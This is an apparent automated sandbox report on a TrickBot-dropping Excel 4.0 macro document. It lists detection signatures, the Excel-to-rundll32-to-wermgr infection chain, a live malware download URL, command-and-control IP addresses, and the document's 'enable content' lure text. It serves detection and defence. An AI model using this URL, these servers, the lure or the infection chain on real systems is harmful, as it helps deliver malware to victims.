Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.20211.29665

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.10350.20211.29665 (renamed file extension from 29665 to xls)
Analysis ID:355601
MD5:a7466c0502a35e0bb2e2d4dd939a57c2
SHA1:3d17487de5287ddb252e768753487c17204358db
SHA256:7223ea0365af06d9e25b51636aec301aa8ab84682427b6a0eacfbfb20befccda

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2544 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2552 cmdline: rundll32 ..\BASE.BABAA,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2496 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
        • wermgr.exe (PID: 2360 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x26ca2:$s1: Excel
  • 0x27d0a:$s1: Excel
  • 0x35b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.2083602374.00000000004A4000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000002.2087529774.00000000001C0000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2087786589.0000000000958000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        00000004.00000002.2087638222.0000000000470000.00000004.00000020.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          00000004.00000003.2083610400.00000000004A4000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.rundll32.exe.1c0000.1.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.1c0000.1.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2276, ProcessCommandLine: rundll32 ..\BASE.BABAA,DllRegisterServer, ProcessId: 2544

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus detection for URL or domainShow sources
                Source: http://www.chipmania.it/mails/open.phpAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted fileShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsVirustotal: Detection: 11%Perma Link
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsReversingLabs: Detection: 23%
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0 CryptAcquireContextW,

                Compliance:

                barindex
                Uses new MSVCR DllsShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Binary contains paths to debug symbolsShow sources
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2088508081.000000006E859000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,

                Software Vulnerabilities:

                barindex
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 10[1].jjkes.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx edx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc dword ptr [esp+40h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec ecx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ecx, word ptr [eax+02h]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx eax, byte ptr [ebx]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc esp
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then dec eax
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then inc edx
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then movzx ebx, word ptr [eax]
                Source: C:\Windows\System32\wermgr.exeCode function: 4x nop then mov ebx, edx
                Source: global trafficDNS query: name: www.chipmania.it
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 108.170.20.75:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.22:49166 -> 108.170.20.75:443
                Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 185.163.45.138:443
                Source: TrafficSnort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.22:49170 -> 200.52.147.93:443
                Source: TrafficSnort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.22:49171 -> 186.137.85.76:443
                Source: Joe Sandbox ViewIP Address: 108.170.20.75 108.170.20.75
                Source: Joe Sandbox ViewIP Address: 185.81.0.78 185.81.0.78
                Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
                Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                Source: Joe Sandbox ViewASN Name: RedesyTelecomunicacionesHN RedesyTelecomunicacionesHN
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 108.170.20.75
                Source: unknownTCP traffic detected without corresponding DNS query: 185.163.45.138
                Source: unknownTCP traffic detected without corresponding DNS query: 185.163.45.138
                Source: unknownTCP traffic detected without corresponding DNS query: 185.163.45.138
                Source: unknownTCP traffic detected without corresponding DNS query: 185.163.45.138
                Source: unknownTCP traffic detected without corresponding DNS query: 185.163.45.138
                Source: unknownTCP traffic detected without corresponding DNS query: 185.163.45.138
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: unknownTCP traffic detected without corresponding DNS query: 200.52.147.93
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
                Source: global trafficHTTP traffic detected: GET /mails/open.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.chipmania.itConnection: Keep-Alive
                Source: rundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: unknownDNS traffic detected: queries for: www.chipmania.it
                Source: rundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2088833322.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087971789.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2088833322.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087971789.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: rundll32.exe, 00000003.00000002.2088833322.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087971789.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2088833322.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087971789.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: rundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2088833322.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087971789.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: wermgr.exe, 00000006.00000002.2350208217.000000000049D000.00000004.00000020.sdmpString found in binary or memory: https://200.52.147.93/rob60/472847_W617601.BDA8D11BBC2A2B9FB3BF7A79DA4C43E9/5/file/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

                System Summary:

                barindex
                Found malicious Excel 4.0 MacroShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsInitial sample: urlmon
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above I . . . . . E' 15 16 Once you have enabled editing
                Source: Screenshot number: 4Screenshot OCR: Enable content button 'Yuts S," " from the yellow bar above :: "";"" " 6~_ 22 23 24 25 26 2
                Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
                Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 1Screenshot OCR: Enable content button from the yellow bar above j'
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B470 NtDelayExecution,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,HeapFree,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00078CA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E0F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00068010
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077840
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00080870
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000644C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000790E0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000714F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061500
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076100
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076D10
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00072580
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000789B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00069200
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CA00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BE20
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077630
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CE70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006A280
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006C290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006CEB0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B700
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073B00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E310
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00062720
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00075F70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000763A8
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000717B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00110040
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Joe Sandbox ViewDropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                Source: rundll32.exe, 00000003.00000002.2088682547.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2087813336.0000000002020000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@9/7@1/4
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\67CE0000Jump to behavior
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{C31B99FC-2BF4-9061-9992-AA9861ECBC5C}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBB24.tmpJump to behavior
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\wermgr.exeSystem information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsVirustotal: Detection: 11%
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsReversingLabs: Detection: 23%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2088508081.000000006E859000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00361BD0 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00361CFD push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00361C7A push dword ptr [edx+14h]; ret
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007D0F0 push 8B48D233h; iretd
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00086969 push es; iretd
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                Source: C:\Windows\System32\wermgr.exeFunction Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened
                Tries to detect virtualization through RDTSC time measurementsShow sources
